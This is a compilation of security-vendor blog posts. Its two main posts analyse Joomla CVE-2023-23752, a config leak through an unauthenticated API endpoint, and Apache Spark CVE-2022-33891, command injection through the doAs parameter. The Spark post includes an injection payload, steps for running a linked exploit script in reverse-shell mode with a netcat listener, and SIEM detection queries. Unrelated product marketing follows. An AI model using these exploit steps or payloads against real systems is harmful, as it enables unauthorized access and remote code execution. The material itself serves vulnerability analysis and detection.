Skip to content

CVE-2023–23752: Joomla Unauthorized Access Vulnerability

Introduction

Unauthorized access vulnerability based on information disclosure in #Joomla CMS versions 4.0.0–4.2.7 has been found and registered as #CVE-2023-23752.

  • Project: Joomla!

  • SubProject: CMS

  • Impact: Critical

  • Severity: High

  • Probability: High

  • Versions: 4.0.0–4.2.7

  • Exploit type: Incorrect Access Control

  • Reported Date: 2023–02–13

  • Fixed Date: 2023–02–16

  • CVE Number: CVE-2023–23752

What is Joomla CMS?

Joomla is a popular open-source content management system (CMS) that allows users to build websites and online applications. It was first released in 2005 and has since grown to become one of the most widely used CMS platforms in the world, with a large and active community of users and developers.

Joomla is built on PHP and uses a MySQL database to store and manage content. It provides a user-friendly interface for managing content, templates, and extensions, making it easy for users with little technical knowledge to create and manage websites.

Joomla offers a wide range of features and functionalities, including the ability to create multiple user accounts with different levels of access, create and manage custom content types, and support for multilingual websites. It also has a large library of extensions and plugins available, allowing users to add new features and functionality to their websites.

Joomla is free to use and distribute, and it is licensed under the GNU General Public License. Its open-source nature has contributed to its popularity and has allowed it to evolve over time, as the community continues to contribute to its development and improvement.

Build the lab

Install the system and prerequisites

  • Setup Ubuntu (I’m using Ubuntu server 20.04)

  • Update the server
     sudo apt update

  • Install Apache
     apt install apache2 

  • Start the apache service
     systemctl start apache2 

  • Check the status of the apache service
     systemctl status apache2

  • Install PHP modules
    apt install php php-xml php-mysql php-mbstring php-zip php-soap php-sqlite3 php-curl php-gd php-ldap php-imap php-common

  • Install mysql
     apt install mysql-server

  • Configure the database

mysql -u root -p
create database joomla;
use joomla;
create user 'user'@localhost identified by '123456';
grant all privileges on joomla.* to 'user'@localhost;
flush privileges;
exit  
  • Create a directory for Joomla

cd /var/www/
mkdir joomla
cd joomla
  • Download Joomla

wget https://downloads.joomla.org/cms/joomla4/4-2-6/Joomla_4-2-6-Stable-Full_Package.zip?format=zip
  • Unzip the folder
    unzip 'Joomla_4-2-6-Stable-Full_Package.zip?format=zip'

  • Configure the permissions

chown -R www-data. ./
chmod -R 755 ./
  • Create virtualhost

vim /etc/apache2/sites-available/joomla.conf

<virtualhost *:80>

servername www.mhzcyber.com
documentroot /var/www/joomla/

</virtualhost>
  • Disable default access
    a2dissite 000-default.conf

  • Enable site access
     a2ensite joomla.conf

  • Enable rewrite module
    a2enmod rewrite

  • Restart Apache service
    systemctl restart apache2

  • Now browse the IP address of the server or the domain name

  • Click “Open Administrator” and login

Background Story

What I’m trying to achieve 

here is an understanding of the software flow, understand how it works, how the vulnerable endpoint gets processed, and why when we set the public parameter to true it gives us all this data finally from where we are getting this data.

What I did?

Basically, I started with reproducing the vulnerability, and from there I went to static analysis but when I got to the route() function, I needed more understanding of the flow, so I started debugging the software, following step by step.
I explained Understand the authentication bypass, Understand where the config data came from and this part made me go back and debug from the beginning starting with index.php so we understand how the data gets loaded, finally I explained understand how this data gets sent i.e. the response.

Reproduce the vulnerability

Browse the following path:

api/index.php/v1/config/application?public=true

Here we can see the leaked information, and all the config data of the database.

This will allow us to access the database if we can remotely connect to it, and if a malicious actor got the ability to access the internal network it will be able to access the database and from there you can implement multiple attacks such as accessing other accounts inside the company, spear phishing, privilege escalation ..etc.

Before we get into the static analysis, I added the methods that I went through during the debugging and the analysis trying to build a flow to make understanding this easier.

Static Analysis

Check the directory of Joomla and you can find configuration.php

I started to search for the following keywords:

  • configuration.php

  • JConfig

  • the keywords existed in the configuration file

and I find that there is an installation folder where we can see “ConfigurationMode.php” basically the purpose of this code is to create and set the configuration file.

I was thinking but how this is getting processed? I mean where I can see what’s happening when we set the public parameter to true

First thing let’s check api/index.php 

Now let’s follow '/includes/app.php' 

After reading the code here, you can read only the comments and it will be enough to make sense (it’s not really relevant). However, from there the most interesting part here is the execute() function.

I followed this and I found the execute() function in CMSApplication.php

I need to study this function and whatever called functions in it, basically, this function contains the high-level logic for executing the application.

I started to check the first 4 functions.

  • sanityCheckSystemVariables()

this method checks for any invalid system variables that may cause issues during the application’s execution and unsets them. If there are any invalid system variables, it aborts the application.

  • setupLogging()

This method sets up the logging configuration for the Joomla CMS application. It checks the application configuration for various logging-related settings and configures loggers accordingly.

  • createExtensionNamespaceMap()

This method allows the application to load a custom or default identity by creating an extension namespace map.

  • doExecute()

When I tried to follow this function, first I got to here:

After that I found the main function here:

It starts with initialiseApp() which basically loads the language, sets some events, and listeners. i.e. Initialize the application.

So, from the called and used functions here the one that got my attention is route()

You can find the route function in the following path : 

\libraries\src\Application\ApiApplication.php -> route

protected function route()
    {
        $router = $this->getContainer()->get(ApiRouter::class);

        // Trigger the onBeforeApiRoute event.
        PluginHelper::importPlugin('webservices');
        $this->triggerEvent('onBeforeApiRoute', array(&$router, $this));
        $caught404 = false;
        $method    = $this->input->getMethod();

        try {
            $this->handlePreflight($method, $router);

            $route = $router->parseApiRoute($method);
        } catch (RouteNotFoundException $e) {
            $caught404 = true;
        }

        /**
         * Now we have an API perform content negotiation to ensure we have a valid header. Assume if the route doesn't
         * tell us otherwise it uses the plain JSON API
         */
        $priorities = array('application/vnd.api+json');

        if (!$caught404 && \array_key_exists('format', $route['vars'])) {
            $priorities = $route['vars']['format'];
        }

        $negotiator = new Negotiator();

        try {
            $mediaType = $negotiator->getBest($this->input->server->getString('HTTP_ACCEPT'), $priorities);
        } catch (InvalidArgument $e) {
            $mediaType = null;
        }

        // If we can't find a match bail with a 406 - Not Acceptable
        if ($mediaType === null) {
            throw new Exception\NotAcceptable('Could not match accept header', 406);
        }

        /** @var $mediaType Accept */
        $format = $mediaType->getValue();

        if (\array_key_exists($mediaType->getValue(), $this->formatMapper)) {
            $format = $this->formatMapper[$mediaType->getValue()];
        }

        $this->input->set('format', $format);

        if ($caught404) {
            throw $e;
        }

        $this->input->set('option', $route['vars']['component']);
        $this->input->set('controller', $route['controller']);
        $this->input->set('task', $route['task']);

        foreach ($route['vars'] as $key => $value) {
            if ($key !== 'component') {
                if ($this->input->getMethod() === 'POST') {
                    $this->input->post->set($key, $value);
                } else {
                    $this->input->set($key, $value);
                }
            }
        }

        $this->triggerEvent('onAfterApiRoute', array($this));

        if (!isset($route['vars']['public']) || $route['vars']['public'] === false) {
            if (!$this->login(array('username' => ''), array('silent' => true, 'action' => 'core.login.api'))) {
                throw new AuthenticationFailed();
            }
        }
    }

why this function is interesting? because it routes the application and routing is the process of examining the request environment to determine which component should receive the request. The component optional parameters are then set in the request object to be processed when the application is being dispatched.

Debugging

From here I started debugging since it started to be hard to understand the flow from the static analysis only.

Set the debugger

I’m using Phpstorm with Xdebug and I’m on ubuntu desktop.

Just download Phpstorm and start it.

After that in Chrome, install this extension

Xdebug helper

Link: https://chrome.google.com/webstore/detail/xdebug-helper/eadndfjplgieldjbigjakmdgkmoaaaoc

After you install it, go to the link, click on the extension, and click debug

Now you will get a message in phpstorem that there is a request coming.

NOTE: you maybe need to restart chrome browser.

You can follow this video for more information:

https://youtu.be/3idASlzGTg4

As debugging and reverse engineering a binary program, usually you would set a breakpoint on the main function. we will do the same here, and in our case index.php can be considered as the main, and it starts running when it runs the app.php which all executable code should be triggered through it.

Understand how the data gets loaded

While you are stepping into the program, you will notice line 25 in app.php where it’s including framework.php

We can see here that there is a pre-loaded configuration and it’s going to load it.

Now in configuration.php we can see all of it.

Here we can see that the data in configuration.php got assigned to the variable $config.

Here I listed the important methods that I noticed the program going through


NOTE: those are not all the methods/functions but those are the most obvious and clarify how the flow works.

route()

  • getContainer()

    This will get DI container, and prepare it.

    In Joomla CMS, a Dependency Injection (DI) container is a software component that manages the instantiation and dependency resolution of objects in the application. It is a design pattern that allows developers to write modular, decoupled, and reusable code.

    The Joomla DI container is based on the PHP-DI library, which provides a simple and flexible way to manage object dependencies in a Joomla application. The DI container is used to instantiate and manage objects and to inject dependencies into them.

  • getMethod()


    This method will get the HTTP request method.


    When you follow it, you will notice it’s going to __get function, and we can see that the $method variable is set to GET.

     

  • handlePreflight()

this handles the preflight requests. A preflight request is a small request that is sent by the browser before the actual request. It contains information like which HTTP method is used, as well as if any custom HTTP headers are present. The preflight gives the server a chance to examine what the actual request will look like before it’s made.

Basically, it will check if this is an OPTIONS request or if CORS is enabled, if not it does nothing.

  • parseApiRoute()

This method parses the given route and returns the name of a controller mapped to the given route. 

it requires a method parameter, Request method to match. One of GET, POST, PUT, DELETE, HEAD, OPTIONS, TRACE, or PATCH. 

it returns an array containing the controller and the matched variables. and if some error happened it will call InvalidArgumentException which is an exception that is thrown when an inappropriate argument is passed to a function. This could be because of an unexpected data type or invalid data.

getRoutePath()

This method will get the path from the route and remove any leading or trailing slash.

This method uses getInstance() which returns the global Uri object, only creating it if it doesn’t already exist, and also getPath() which gets the URL path string. here are the values of both:

Now back to parseApiRoute(), we have this line

$query = Uri::getInstance()->getQuery(true);

and this will retrieve the parameter public and its value true

After that, it goes through a for loop to iterate through all of the known routes looking for a match, and here we can see the matches.

From there going back to route()

and you can see that all the variables are set.

Now it will trigger an event which means it will get the event name ‘onAfterApiRoute’ and it will set some values.

$this->triggerEvent('onAfterApiRoute', array($this));

Understand the authentication bypass

After that we go to the if statement that checks if the $route variable
contains a key 'public' and if its value is false. If the key is not set or its value is false, the code attempts to log in the user by calling the $this->login() method with two parameters: an empty array for the username and an array containing two additional parameters: 'silent' => true and 'action' => 'core.login.api'.

If the login fails, the code throws an AuthenticationFailed exception.

But if the 'public' key is set to a value of true in the $route variable, the first part of the if condition in the code snippet will evaluate to false. This means that the code inside the if block will not be executed, and the user will not be required to log in.

Therefore, if 'public' is set to true, the user will have access to the route without the need for authentication.

and this is why we can bypass the authentication or no authentication required to access the data.

Understand where the config data came from

Now going back to the doExecute() function, we reached to dispatch() method.

when I reached here I was still trying to understand how the data gets retrieved, and while I’m stepping into dispatch() method, I got here:

As you can notice the $component variable set to “config” and here I started to follow config and I found the following:

libraries/vendor/joomla/application/src/AbstractApplication.php

and this is what pushes me to go from the beginning and start debugging from index.php to Unserstand how the data gets loaded.

a note, $config variable, and the data are already assigned as we saw in the Understand how the data gets loaded section.

understand how this data gets sent

now we need to understand how this data gets sent.

going back to dispatch() basically, it’s responsible for rendering a particular component (specified by $component or via the ‘option’ HTTP GET parameter) and setting up the associated document buffer, while also triggering a plugin event after the component has been dispatched.

now back to execute() it will render the output and rendering is the process of pushing the document buffers into the template placeholders, retrieving data from the document, and pushing it into the application response buffer, and here basically you will see the program sets the body content and prepare it.

after that, we will see the respond() method called and this method prepares the headers and the response to be sent.

after it will trigger the onAfterRespond event which means it’s the end but one last touch is to shut down the registered function for handling PHP fatal errors. using handleFatalError() function and you will notice that it will go to DatabaseDriver.php to __destructor() to disconnect from the database.

Mitigation

Upgrade to version 4.2.8

Final Thoughts

This was a really hard one to debug and analyze, and that’s because the way Joomla CMS is developed they break it into small components, methods ..etc, and basically they go through a lot of loops to break each request, take the input through some regex check, and also initiate all the needed components/variables for this request.

The explanation here was not straightforward, not like going step by step, there’s some go back and forth with the analysis and this is intended since I wanted to give you a window to see closely to some level what I went through during the analysis.

I believe it would be hard to really understand the whole flow not only the vulnerability itself but also the program if you don’t debug it by yourself and step into it step by step. However, I tried to give more of a general look and go more in detail with the root cause of the vulnerability itself.

Resources:

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Apache Zero Days – Apache Spark Command Injection Vulnerability (CVE-2022-33891)

Component Name:

Apache Spark

Affected Versions:

Apache Spark ≤3.0.3

3.1.1≤ Apache Spark ≤3.1.2

3.2.0≤ Apache Spark ≤3.2.1

Vulnerability Type:

Command Injection

CVSSv3:

Base Score:                                    8.8 (High)

Attack Vector:                                 Network

Attack Complexity:                             Low

Privileges Required:                           None

User Interaction:                              None

Confidentiality Impact:                        High

Integrity Impact:                              High

Availability Impact:                           High

Remediation Solutions:

Check the Component Version:

Run spark-shell command. The version information will be displayed.

 

Apache Solution

Users can update their affected products to the latest version to fix the vulnerability:

https://spark.apache.org/downloads.html

How does it work?

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.

User commands are processed through ?doAs parameter and nothing reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

OS commands that are passed on the URL parameters?doAs will trigger the background Linux bash process which calls cmdseq will run the process with the command line id -Gn .Running of bash with id -Gn is a good sign of indicator that your server is vulnerable or it is already compromised.

If an attacker is sending reverse shell commands. There is also a high chance of granting apache spark server access to the attackers’ machine.

private def getUnixGroups(username: String): Set[String] = {
val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
// we need to get rid of the trailing "\n" from the result of command execution
Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
Utils.executeAndGetOutput(idPath :: "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
}}

Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41

 

The command injection occurs because Spark checks the group membership of the user passed in the ?doAs parameter by using a raw Linux command.

Vulnerable component

http://<IP_address>/?doAs=`[command injection here]`

User commands are processed through ?doAs parameter and nothing reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

Vulnerable Method:

private def getUnixGroups(username: String): Set[String] = {
    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
    // we need to get rid of the trailing "\n" from the result of command execution
    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet
  }
}

This is a method definition in Scala for a private method named getUnixGroups. This method takes a single String argument called username and returns a Set of Strings that represent the groups that the user belongs to on a Unix-like system.

 

The method first constructs a Seq of Strings that represents a shell command to retrieve the user’s group information using the id command. The cmdSeq variable is set to this sequence, with the username parameter concatenated to the end of the command using string concatenation.

 

Next, the executeAndGetOutput method of the Utils object is called with cmdSeq as its argument. This method executes the shell command represented by the cmdSeq sequence and returns the output of the command as a string.

 

The output of the executeAndGetOutput method is then processed to remove the trailing newline character using the stripLineEnd method. The resulting string is then split into an array of strings using the split method and converted into a Set using the toSet method. This Set of strings represents the user’s group membership.

 

    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)

 

The getUnixGroups method constructs a shell command by concatenating the username parameter with the id command. The username parameter is not properly sanitized or validated, which means that an attacker could potentially inject malicious code into it and execute arbitrary commands on the underlying operating system.

 

For example, if an attacker were to supply a username parameter of “; echo hacked > /tmp/hacked”, the resulting shell command would be “id -Gn ; echo hacked > /tmp/hacked”. When this command is executed by the executeAndGetOutput method, it would execute the id command and then execute the echo command, which writes the string “hacked” to the file /tmp/hacked. This would give the attacker arbitrary code execution on the underlying operating system.

In current scenario we can see that OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process which calls cmdseq will run the process with the command line id -Gn. Running of bash with id -Gn is a good sign of indicator that your server is vulnerable or it is already compromised.

If an attacker is sending reverse shell commands. There is also a high chance of granting Apache spark server access to the attackers’ machine.

Detection & Response:

This can allow the attacker to reach a permission check function that builds a Unix shell command based on their input, which is then executed by the system. This can result in arbitrary shell command execution with the privileges of the Spark process, potentially leading to complete compromise of the affected system.

The Apache Spark command injection vulnerability (CVE-2022-33891) is a serious security issue that can allow an attacker to execute arbitrary code with the privileges of the Spark process, potentially leading to complete compromise of the affected system. It is important for organizations using Apache Spark to be aware of this vulnerability and take steps to detect and respond to it.

One way to detect the vulnerability is to monitor for suspicious activity on the affected system. This can include monitoring for unexpected system or network behavior, such as unusual network traffic or system resource usage. It can also include monitoring for malicious activity, such as attempts to execute unauthorized code or access restricted resources.

Another way to detect the vulnerability is to use security tools and technologies, such as intrusion detection systems (IDS) and vulnerability scanners, to identify potential vulnerabilities and security issues on the system. These tools can help to identify and alert on potential security threats, allowing organizations to take appropriate action to mitigate the risk.

Once the vulnerability has been detected, it is important to take swift action to respond to the issue. This may include isolating the affected system to prevent further compromise, implementing temporary fixes or workarounds, and deploying a patch or update to address the issue. It is also important to conduct a thorough investigation to determine the root cause of the vulnerability and implement measures to prevent similar issues from occurring in the future.

Splunk:

index=* c-uri="*?doAs=`*"
index=* (Image="*\\bash" AND (CommandLine="*id -Gn*"))

Qradar:

SELECT UTF8(payload) from events where LOGSOURCENAME(logsourceid) ilike '%Linux%' and "Image" ilike '%\bash' and ("Process CommandLine" ilike '%id -Gn%')

SELECT UTF8(payload) from events where "URL" ilike '%?doAs=`%'

Elastic Query:

url.original:*?doAs\=`*
(process.executable:*\\bash AND process.command_line:*id\ \-Gn*)

Carbon Black:

(process_name:*\\bash AND process_cmdline:*id\ \-Gn*)

FireEye:

(process:`*\bash` args:`id -Gn`)

GrayLog:

(Image.keyword:*\\bash AND CommandLine.keyword:*id\ \-Gn*)
c-uri.keyword:*?doAs=`*

RSA Netwitness:

(web.page contains '?doAs=`')
((Image contains 'bash') && (CommandLine contains 'id -Gn'))

Logpoint:

(Image="*\\bash" CommandLine IN "*id -Gn*")
c-uri="*?doAs=`*"

 

Technical Detail:

  1. First you need to clone exploit python script from github repository into your local machine using below command.

                ```
git clone https://github.com/devengpk/Apache-zero-days.git
                ```
  1. Apache Spark server is ready to test if this self hosted server is vulnerable or not

  2. Now, let’s check if this target is vulnerable or not using below mentioned command

```
python3 exploit.py -u http://<server-ip> -p 8080 --check --verbose
```

  1. From the above commands result, we found that the searched target is vulnerable.

Now let’s use our exploit to get the reverse shell by using the below command.

```
python3 exploit.py -u http://<Server-IP> -p 8080 --revshell -lh <Attacker-IP> -lp 9001 --verbose
```

  1. Before starting the reverse shell, let’s start netcat listener to capture traffic for reverse shell using below mentioned command.

```
nc -nvlp 9001
```

  1. After executing netcat command, execute the above mentioned reverse shell command and you will successfully got reverse shell and can execute all your desired commands on the target server.

Reference:

●       Exploitation payload: https://github.com/devengpk/Apache-zero-days
●       Vulnerable source code: https://github.com/apache/spark/pull/36315/files#diff-96652ee6dcef30babdeff0aed66ced6839364ea4b22b7b5fdbedc82eb655eeb5L41


#Apache #Apache_Spark #CVE-2022-33891

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Topia
TOPIA is a consolidated vulnerability management platform that protects assets in real time. Its rich, integrated features efficiently pinpoint and remediate the largest risks to your cyber infrastructure. Resolve the most pressing threats with efficient automation features and precise contextual analysis.

Critical Infrastructure’s Silent Threat: Part 2 – Understanding PLCs

Part 2: Decoding the Complexity of PLCs

In part one of this series we explained how Programmable Logic Controllers (PLCs) have become key targets for cyber security attacks due to their legacy design, lack of built-in security features, and susceptibility to malware, and how newer PLCs are starting to incorporate more robust security features to help protect against these threats.

Before we can understand how PLCs can be targeted in attacks, we need to understand what they are, how they work and what can be targeted.

Continue reading

Utah Passes Law Requiring Parental Consent for Minors on Social Media: How DNS Filtering Can Help Protect Children Online

Utah has passed a new law that requires parental consent for minors to use social media. The law aims to protect children from potential harm and social media addiction, but critics argue it could be difficult to enforce and limit free speech. The law will take effect in March 2024 and could set a precedent for other states.

Under the new law, social media companies must obtain consent from parents or legal guardians of minors before collecting, storing, or using their personal information. The law also requires social media platforms to provide an option for parents to access and delete any information their children have shared on the platform.

Parental controls with DNS filtering are a type of internet filter that parents can use to limit their children’s access to certain websites and online content. This type of filter works by using a DNS (Domain Name System) server to redirect requests for specific websites or types of content to a block page or a filtered version of the website.

DNS filtering can be a useful tool for parents who want to protect their children from online threats such as inappropriate content, cyberbullying, and phishing attacks. It can also be helpful in managing screen time and limiting access to specific websites or online activities during certain times of the day.

Some parental control solutions that use DNS filtering also offer additional features such as content categorization, which can automatically block access to websites in certain categories such as gambling, drugs, or adult content. These solutions can also allow parents to create individual profiles for each child and set customized filtering rules based on their age and maturity level.

Overall, parental controls with DNS filtering can be an effective way for parents to protect their children from online dangers and promote safe and responsible internet use.

To ensure compliance with the new law and provide the first layer of protection for children online, start your free trial here.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About SafeDNS
SafeDNS breathes to make the internet safer for people all over the world with solutions ranging from AI & ML-powered web filtering, cybersecurity to threat intelligence. Moreover, we strive to create the next generation of safer and more affordable web filtering products. Endlessly working to improve our users’ online protection, SafeDNS has also launched an innovative system powered by continuous machine learning and user behavior analytics to detect botnets and malicious websites.

Blazing New Trails In Keeping Your Network Safe

Not to brag, but 2022 was a banner year for us here at Portnox!  Not content with just having an award-winning cloud-native zero trust platform, we had several major releases that continue to raise the bar for zero trust solutions everywhere.

Tackling TACACS+ – as a Service!:

How do you keep network device administration from turning into a nightmare of changing password policies, too many people having too much access, and risking constant device lockouts?

TACACS+, of course! After all, it’s the industry standard for making device access manageable.

Portnox released the first ever cloud-native TACACS+ service, which combines Authentication, Authorization, and Accounting (AAA) services with all the benefits of a fully cloud-native platform – e.g. we work with the equipment you have, and no nights wasted for upgrades and patches.

Our TACACS+ service offers seamless integration with your existing identity provider, as well as key features like privilege levels and executed command logging to make network device administration simpler than ever.

TACACS Diagram

Shining a Light on the Shadows: IoT Fingerprinting

IoT (Internet of Things) devices are inescapable at this point – everything from your fish tank to your fridge can connect to the internet.  The use cases for these devices span many industries – from IoMT (Internet of Medical Things) which can monitor your health and adjust medication in real-time, to IIoT (Internet of Industrial Things) which can track inventory down to the smallest screw in seconds, to the more familiar consumer IoT which lets you control your window blinds, thermostat, lights, and more from your phone.

But as useful as these devices are, they present an equal number of security concerns, chief among them being visibility. That’s to say – how do you know when they’re connected to your network?


Enter IoT Fingerprinting from Portnox – the first ever cloud-native fingerprinting service that requires no on-prem installation or setup whatsoever!  No more having to watch your network slow to a crawl while running a port scanner, or painstakingly troubleshooting how to deploy a listener. You will see your IoT devices and all the information you need – make, model, OS, firmware – and still maintain the magic of a cloud-native solution with no upgrades, patches, or maintenance taking up your free time.


What’s our secret?  DHCP Gleaning! This is a process by which the switch listens in on DHCP requests when a device joins the network and asks for an IP and extracts information from the request that helps identify the device. Many enterprise switches support this (although they may not call it Gleaning specifically; that’s actually a Cisco term.)

DHCP Goes Even Further

While DHCP Gleaning is an excellent method of gathering critical information about your IoT devices, the downside is that not all enterprise switches support it. And that’s another tricky thing about IoT devices – they don’t respond to traditional monitoring protocols, they often ship with all ports closed, and you can’t install extra software on them. So how do you discover and fingerprint them on your network if you can’t take advantage of DHCP gleaning?

Enter another first – Portnox’s SaaS-based DHCP listener! This makes IoT Fingerprinting truly vendor agnostic, as any switch worth its salt will be able to configure a DHCP helper (sometimes called a DHCP relay agent or forwarder.) With a simple configuration, your device will listen for DHCP and BOOTP broadcasts and forward them to our DHCP listener. And when we say simple configuration, we mean it – here’s a sample from a Cisco IOS router:

ROUTER> ENABLE
ROUTER# CONFIGURE TERMINAL
ROUTER(CONFIG)# INTERFACE VLAN2
ROUTER(CONFIG-IF)# IP HELPER-ADDRESS 20.85.253.96

Just 4 simple lines and you’re ready to go. Most devices support the configuration of more than one listener, too, so if you already have one set up for something else you can still take advantage of our cloud-based listener.

Wearing Shades for the Future

We’re pretty proud of these features, but we obviously have no intention of resting on our laurels.  We have a lot of exciting things planned for 2023 to continue our commitment to protecting your weekends from maintenance and upgrades with a cloud-native, vendor-agnostic, feature-rich, zero trust, network access control platform.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About Portnox
Portnox provides simple-to-deploy, operate and maintain network access control, security and visibility solutions. Portnox software can be deployed on-premises, as a cloud-delivered service, or in hybrid mode. It is agentless and vendor-agnostic, allowing organizations to maximize their existing network and cybersecurity investments. Hundreds of enterprises around the world rely on Portnox for network visibility, cybersecurity policy enforcement and regulatory compliance. The company has been recognized for its innovations by Info Security Products Guide, Cyber Security Excellence Awards, IoT Innovator Awards, Computing Security Awards, Best of Interop ITX and Cyber Defense Magazine. Portnox has offices in the U.S., Europe and Asia. For information visit http://www.portnox.com, and follow us on Twitter and LinkedIn.。

Find out for yourself what telemetry is

Here at Pandora FMS blog we like to get up early, prepare a cup of pennyroyal mint and while it settles, do a couple of stretches, wash our face and start the day defining strange words worth something for our readers. Today it’s time for: Telemetry!

Do you already know what telemetry is? Today we will tell you

Shall we get straight to the point?

Straight to the point then it is!

Telemetry, roughly speaking, is what automatically measures, collects and sends data from remote sources, thanks to devices that collect data.

It then transmits that data to a central location where it is analyzed and you can then consider your remote system as supervised and controlled.

Of course telemetry data helps, while controlling security, to improve customer experience and monitor application status, quality and performance.

But let’s go further, what is the true purpose of telemetry?

As can be understood, the collection of telemetry data is essential to manage IT infrastructures.

Data is used to monitor system performance and keep actionable information on hand.

How do we measure telemetry?

Easy-peasy! 

Through monitoring!

Monitoring tools measure all types of telemetry data. 

They start with server performance and head towards actionable infinity.

Some types of telemetry data

It all starts with a small signal that indicates whether a server is active or inactive.

Then it tends to get complicated. 

Event and metric data already includes the CPU utilization of a server, including peaks and averages over different periods. 

For example, a type of telemetry data to be monitored includes server memory utilization and I/O loading over time.

*This data is particularly important when using server virtualization.

In these situations, statistics provided by virtual servers may not reveal problems with CPU or memory utilization; instead, the underlying physical server may be underutilized in terms of physical memory, virtualization, CPU, and I/O connectivity with peripherals.

Finally, user requests over time and concurrent user activity on standard deviation charts should be included in server-specific metrics.

This will reveal how your systems are being used in general, as well as information about server performance.

Telemetry Data Monitoring

Now that we’ve taken a look at servers and their telemetry, let’s dig a little deeper into some of the fundamental components of their physical application.

This includes:

  • Network infrastructure.
  • Storage infrastructure.
  • Capacity.
  • Overall bandwidth consumption.

As any experienced IT guy can warn you:

Quantifying network monitoring beyond the strictly commonplace is important.

Measuring network traffic in bits per second across LANs and sub-LANs within your application infrastructure should always be part of monitoring network utilization.

To predict when packets will be lost and when storms may take place in your network, it is essential to understand the theoretical and practical limits of these segments.

The utilization of the segment’s bandwidth over time in multiple network areas must be revealed by network monitoring.

Monitoring certain network protocols will also provide a more detailed view of application usage in real time and, perhaps, of performance issues for certain features.

Likewise, monitoring requests to certain network ports can also reveal any security gaps, as well as routing and switching delays in the relevant network components.

In addition to monitoring raw network usage, it is necessary to monitor the storage systems connected to the network.

To show storage usage, waiting times, and likely disk failures, specific telemetry is required.

Again, it is important to monitor both overuse and underuse of storage resources.

Some basic application telemetry monitoring data

It is very important to monitor the telemetry that can involve access to the database and its processing, monitor the number of open database connections, which can be triggered and affect performance.

Tracking over time allows you to spot design decisions that don’t change as application usage grows.

It is equally crucial to control the number of queries to the database, their response times, and the amount of information circulating between the database and applications.

Outliers and averages should also be taken into account.

Uncommon latency can be concealed or hidden if only averages are controlled, but these outliers could still have a negative impact and irritate users.

Your monitoring strategy should always take into account tool exceptions, database errors or warnings, application server logs looking for unusual activity…

And that’s just the beginning!

Your monitoring software

Having a solid monitoring strategy is crucial, but so is having a well-thought-out reaction strategy that incorporates:

  • Determining, understanding and initiating root cause analysis.
  • A written communication strategy that includes the names and contact details of those responsible.
  • Identifying easy solutions to restore the program in the short term.
  • A research strategy to prevent future problems.

Telemetry Monitoring Elements

Some telemetry monitoring elements that you may use:

  • Dashboards or other real-time system information and telemetry tools.
  • Technologies for analyzing records safe for use with production systems.
  • Business intelligence to retrieve data from records, such as usage trends or security issues during specific time periods.
  • Tools that automate risk detection, recovery, and mitigation to get rid of manual labor.

Using a centralized system and working with a software vendor, you may set in place a robust monitoring strategy that will be developed over time and become more comprehensive.

And there, my friend, is where we come in!

As you have seen, the Oracle tasks configured in Discovery allow you to connect to remote Oracle instances to monitor them and to generate module blocks with important information. Today we focus solely on Oracle, but it is necessary to emphasize that the Discovery menu also allows you to monitor other applications.

About Version 2 Limited
Version 2 Limited is one of the most dynamic IT companies in Asia. The company develops and distributes IT products for Internet and IP-based networks, including communication systems, Internet software, security, network, and media products. Through an extensive network of channels, point of sales, resellers, and partnership companies, Version 2 Limited offers quality products and services which are highly acclaimed in the market. Its customers cover a wide spectrum which include Global 1000 enterprises, regional listed companies, public utilities, Government, a vast number of successful SMEs, and consumers in various Asian cities.

About PandoraFMS
Pandora FMS is a flexible monitoring system, capable of monitoring devices, infrastructures, applications, services and business processes.
Of course, one of the things that Pandora FMS can control is the hard disks of your computers.

We received ISO/IEC 27001!

We live in an uncertain world and monitoring should try to ensure that whatever happens we will always stay informed.

Therefore, security is the basis of everything in monitoring and for us it has always been one of the pillars of our strategy as a product.

You still didn’t know it? Pandora FMS gets ISO/IEC-27001

